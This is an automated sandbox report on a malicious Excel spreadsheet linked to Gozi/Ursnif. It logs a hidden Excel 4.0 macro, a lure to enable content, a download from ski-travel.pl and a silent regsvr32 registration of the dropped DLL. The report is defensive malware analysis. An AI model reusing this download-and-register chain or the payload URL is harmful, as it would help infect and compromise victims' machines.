Loading ...

Play interactive tourEdit tour

Analysis Report document-143363659.xls

Overview

General Information

Sample Name:document-143363659.xls
Analysis ID:324302
MD5:74bdbc9d1413b77ee917072acb6804a1
SHA1:b1434c7a2a4163c7b0d8837e00315dc3327d14a2
SHA256:ea3fafe9a5e2771adb636314b23765e263e263d4e3ad3d2a3fc0a96a5f689be5
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2520 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-143363659.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-143363659.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1204, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2520

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: global trafficDNS query: name: ski-travel.pl
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.181.228.60:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 194.181.228.60:80
    Source: Joe Sandbox ViewIP Address: 194.181.228.60 194.181.228.60
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ski-travel.plConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ski-travel.plConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: ski-travel.pl
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheContent-Type: text/htmlContent-Length: 1237Date: Sun, 29 Nov 2020 03:12:56 GMTServer: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 7
    Source: regsvr32.exe, 00000003.00000002.2092624557.0000000001D60000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: document-143363659.xlsString found in binary or memory: http://ski-travel.pl/ds/231120.gif

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X J7 - (" X 0' jR I" A A B C D E F G H I K L M N O P Q R S T : 1 2 3 4 5 6
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-143363659.xlsInitial sample: CALL
    Source: document-143363659.xlsInitial sample: CALL
    Source: document-143363659.xlsInitial sample: CALL
    Source: document-143363659.xlsInitial sample: CALL
    Source: document-143363659.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-143363659.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-143363659.xlsOLE indicator, VBA macros: true
    Source: document-143363659.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal72.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\40EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD642.tmpJump to behavior
    Source: document-143363659.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-143363659.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-143363659.xls14%MetadefenderBrowse
    document-143363659.xls7%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://ski-travel.pl/ds/231120.gif0%URL Reputationsafe
    http://ski-travel.pl/ds/231120.gif0%URL Reputationsafe
    http://ski-travel.pl/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    ski-travel.pl
    194.181.228.60
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://ski-travel.pl/ds/231120.giffalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2092624557.0000000001D60000.00000002.00000001.sdmpfalse
      • Avira URL Cloud: safe
      low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      194.181.228.60
      unknownPoland
      8308NASK-COMMERCIALPLfalse

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:324302
      Start date:29.11.2020
      Start time:04:12:01
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 15s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:document-143363659.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.expl.evad.winXLS@3/5@1/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/324302/sample/document-143363659.xls

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      194.181.228.60document-1416696952.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1416696952.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1436581815.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1436581815.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1457050144.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1457050144.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1448745111.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1448745111.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1437759569.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1437759569.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1443549938.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1443549938.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1437303313.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1437303313.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1451937055.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1451937055.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1450891431.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1450891431.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1456899782.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif
      document-1456899782.xlsGet hashmaliciousBrowse
      • ski-travel.pl/ds/231120.gif

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      ski-travel.pldocument-1416696952.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1416696952.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1436581815.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1436581815.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1457050144.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1457050144.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1448745111.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1448745111.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437759569.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437759569.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1443549938.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1443549938.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437303313.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437303313.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1451937055.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1451937055.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1450891431.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1450891431.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1456899782.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1456899782.xlsGet hashmaliciousBrowse
      • 194.181.228.60

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      NASK-COMMERCIALPLdocument-1416696952.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1416696952.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1436581815.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1436581815.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1457050144.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1457050144.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1448745111.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1448745111.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437759569.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437759569.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1443549938.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1443549938.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437303313.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1437303313.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1451937055.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1451937055.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1450891431.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1450891431.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1456899782.xlsGet hashmaliciousBrowse
      • 194.181.228.60
      document-1456899782.xlsGet hashmaliciousBrowse
      • 194.181.228.60

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\7EDE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):315414
      Entropy (8bit):7.985610968990586
      Encrypted:false
      SSDEEP:6144:6C+rFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MR:6tFPM8R3AsB+bjej/9cK
      MD5:6C2D48B6D81174FB43689BD646FF02C7
      SHA1:21A91628A18332923635323E3242A84705575BDE
      SHA-256:50EDF005A4361E9D5DFD365DB7165BCA4CF733CD59D0194B8F4A8F914304CC00
      SHA-512:058C641D921561326F0DF01AF86FD06752C1B88D206B105734B195C574F1E7477D7C05E13E3D4B98BECD552DF363532195A2B19A347A6F611289C479BDDB0115
      Malicious:false
      Reputation:low
      Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 11:12:42 2020, atime=Sun Nov 29 11:12:42 2020, length=8192, window=hide
      Category:dropped
      Size (bytes):867
      Entropy (8bit):4.474185321268547
      Encrypted:false
      SSDEEP:12:85QEf/CLgXg/XAlCPCHaXgzB8IB/NPkX+WnicvbzEbDtZ3YilMMEpxRljKT+TdJU:85z/U/XTwz6IEYewDv3qa+rNru/
      MD5:12BCA8014CAA06B8585006214B53BE98
      SHA1:B0A2D2F9249B5A39AA7B93954CFDC91C34C53B19
      SHA-256:284DCD8077E2C38CAFAD3B79576FC909756ED60AA0CE0333B600FB9F21D35835
      SHA-512:6AE55F8465212A1017A15ADBEEA73522D99881A8483550CB2EC6C767FECF5A72CE461FD8B673B7F538DD3C8E9BA45A50EDA0721BAE46F10FA429EEC088231B9E
      Malicious:false
      Reputation:low
      Preview: L..................F...........7G..`g].H...`g].H.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q.a..Desktop.d......QK.X}Q.a*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-143363659.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun Nov 29 11:12:42 2020, atime=Sun Nov 29 11:12:42 2020, length=338432, window=hide
      Category:dropped
      Size (bytes):4216
      Entropy (8bit):4.539339917518827
      Encrypted:false
